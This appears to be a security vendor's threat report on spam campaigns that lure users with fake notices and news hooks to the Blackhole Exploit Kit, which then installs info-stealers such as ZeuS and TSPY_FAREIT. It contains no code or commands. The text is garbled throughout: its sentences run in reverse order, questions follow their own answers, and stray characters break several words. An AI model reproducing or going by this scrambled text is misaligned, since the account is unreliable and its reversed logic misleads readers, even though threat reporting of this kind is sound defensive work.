Poses as an official announcement from Scribd Live of the birth of Prince William and Kate Middleton's sonĭrops TROJ_MEDFOS.JET that downloads malicious files Below are some of the recent noteworthy Blackhole exploit-related attacks. What are the different attacks related to the Blackhole exploits?ĭuring the course of our investigation, we encountered several sample messages that spoofed email from different websites. This just goes to show that reliable exploits have a longer shelf life and attackers can still use it for future attacks. Note however, that most of these exploits take advantage of old and known vulnerabilities. This attack also capitalizes on exploiting software vulnerabilities. This is why these messages are difficult to detect using traditional methods.” As Trend Micro product manager Sandra Cheng pointed out, “The format and wording of these email were made to look legitimate. Not only is this an effective bait, it is also a technique to prevent traditional email blocking methods. The attacks are also effective because the phishing emails are made to look exactly like authentic email notices from legitimate websites. One of their tactics is to leverage relevant and hot topics or news items and use popular brand names. The people behind these attacks use social engineering techniques to trick users into performing particular actions, like clicking links to lead to the Blackhole exploit kit. This, in turn may be used to launch other attacks or stolen information can be sold in the underground cybercrime. As such, users are at risk of having their personal information and credentials related to their bank/financial accounts stolen. Furthermore, it uses a predetermined set of passwords in order to brute force Windows login. It also collects information such as stored email credentials and login details from browsers. TSPY_FAREIT variants specifically TSPY_FAREIT.AFM, which is used in the latest BHEK spam run, steals FTP client account information. What happens when user systems become infected with TSPY_FAREIT variants? Based on our investigation, this type of attack spreads information-stealing malware like ZeuS/ZBOT and more recently, TSPY_FAREIT variants. Once a successful exploit has taken place, the Blackhole Exploit Kit initiates the malware installation. The Blackhole Exploit Kit can target vulnerabilities in several software including third-party applications like Adobe Acrobat, Flash Player, Java and Windows. This code is responsible for searching for vulnerable software to exploit. Once the iframe loads, another obfuscated script loads from the Blackhole Exploit Kit site. This script uses an embedded iframe that points to strictly malicious site that uses the Blackhole Exploit Kit. Users who are tricked into clicking the links are led to a compromised / abused website that contains a malicious JavaScript. What happens when users click the links in the spammed messages? Users are then redirected to compromised sites, and then finally, sites hosting the Blackhole Exploit Kit. The messages are typically disguised as spoofed notifications of well-known e-commerce and social networking sites. The spammed messages often use social engineering techniques to lure recipients into clicking the links. The cybercriminals behind the attacks that spread the exploit kit send out spammed messages containing links. The popularity of exploit kits particularly the Blackhole Exploit Kit has indeed become a cybercriminal’s favorite.īlackhole exploits kits are hosted on specific malicious sites. These incidents show that attacks that use exploit kits are an ongoing trend in today’s threat landscape. The top countries where the spam run originated are US, India, and Kazakhstan. It also posed as bogus notifications from Facebook and eBay as a social engineering tactic.īased on our investigation, the spam volume related to the BHEK spam campaign reached up to 0.8% of the collected spammed messages in mid-2013. We noted several related spam campaigns that leveraged newsworthy items such as the birth of the royal baby and the movie, Ender’s Game. Over the course of our monitoring and investigation, we saw several changes such as how cybercriminals use Blackhole Expoit Kit and the many lures it has utilized like bogus notifications from social networking website, courier and bank notices, and cable email update, among others. This is done to lure users into clicking a URL that points to sites hosting Blackhole Exploit Kit. One of the prevalent exploit kits in the cybercrime today is Blackhole Exploit Kit (BHEK), which used spammed message that looks exactly like the legitimate email and leverages relevant and timely topics.
0 Comments
Leave a Reply. |